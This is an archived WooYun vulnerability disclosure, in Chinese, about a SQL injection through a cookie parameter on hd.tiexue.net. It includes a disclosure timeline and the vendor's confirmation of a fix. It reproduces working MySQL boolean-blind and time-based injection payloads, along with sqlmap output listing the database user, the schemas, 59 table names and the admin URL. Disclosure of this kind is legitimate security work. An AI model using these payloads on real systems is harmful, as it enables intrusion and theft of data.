乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-09: 细节已通知厂商并且等待厂商处理中 2015-06-11: 厂商已经确认,细节仅向厂商公开 2015-06-21: 细节向核心白帽子及相关领域专家公开 2015-07-01: 细节向普通白帽子公开 2015-07-11: 细节向实习白帽子公开 2015-07-26: 细节向公众公开
233
这是一个指哪修哪的洞,希望厂商这次能重视GET / HTTP/1.1Cookie: TTtuangou_tFrcLX_sid=1; TTtuangou_tFrcLX_loginref=http%3A%2F%2Fhd.tiexue.net%2FX-Requested-With: XMLHttpRequestReferer: http://hd.tiexue.net/Host: hd.tiexue.netConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36Accept: */*还有这类页面: /activity_1.html /admin.php /reserve_1.html /view-136.html
---Parameter: TTtuangou_tFrcLX_sid (Cookie) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: TTtuangou_tFrcLX_sid=1' RLIKE (SELECT (CASE WHEN (2866=2866) THEN 1 ELSE 0x28 END)) AND 'EZwI'='EZwI; TTtuangou_tFrcLX_loginref=http://hd.tiexue.net/ Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: TTtuangou_tFrcLX_sid=1' AND (SELECT * FROM (SELECT(SLEEP(5)))xksz) AND 'gANi'='gANi; TTtuangou_tFrcLX_loginref=http://hd.tiexue.net/---web application technology: Nginx, PHP 5.4.7back-end DBMS: MySQL 5.0.12current user: 'hdu@localhost'available databases [3]:[*] information_schema[*] test[*] txhddataDatabase: txhddata[59 tables]+--------------------------------------+| cenwor_system_failedlogins || cenwor_system_log || cenwor_system_memberfields || cenwor_system_members || cenwor_system_onlinetime || cenwor_system_report || cenwor_system_robot || cenwor_system_robot_ip || cenwor_system_robot_log || cenwor_system_role || cenwor_system_role_action || cenwor_system_role_module || cenwor_system_sessions || cenwor_tttuangou_activity || cenwor_tttuangou_activity_user || cenwor_tttuangou_address || cenwor_tttuangou_api_apps || cenwor_tttuangou_api_protocol || cenwor_tttuangou_api_session || cenwor_tttuangou_article || cenwor_tttuangou_attrs || cenwor_tttuangou_attrs_cat || cenwor_tttuangou_attrs_order || cenwor_tttuangou_catalog || cenwor_tttuangou_city || cenwor_tttuangou_city_place || cenwor_tttuangou_comments || cenwor_tttuangou_express || cenwor_tttuangou_express_area || cenwor_tttuangou_express_cdp || cenwor_tttuangou_express_corp || cenwor_tttuangou_express_printer_log || cenwor_tttuangou_finder || cenwor_tttuangou_links || cenwor_tttuangou_metas || cenwor_tttuangou_order || cenwor_tttuangou_order_clog || cenwor_tttuangou_paylog || cenwor_tttuangou_payment || cenwor_tttuangou_prize_phone || cenwor_tttuangou_prize_ticket || cenwor_tttuangou_prize_ticket_win || cenwor_tttuangou_product || cenwor_tttuangou_push_log || cenwor_tttuangou_push_queue || cenwor_tttuangou_push_template || cenwor_tttuangou_question || cenwor_tttuangou_recharge_card || cenwor_tttuangou_recharge_order || cenwor_tttuangou_regions || cenwor_tttuangou_reports || cenwor_tttuangou_seller || cenwor_tttuangou_service || cenwor_tttuangou_subscribe || cenwor_tttuangou_ticket || cenwor_tttuangou_uploads || cenwor_tttuangou_usermoney || cenwor_tttuangou_usermsg || cenwor_tttuangou_zlog |+--------------------------------------+后台地址:http://hd.tiexue.net/admin.php
~~~~~~~~·
危害等级:高
漏洞Rank:15
确认时间:2015-06-11 12:23
非常感谢路人甲,我们及时修复
暂无
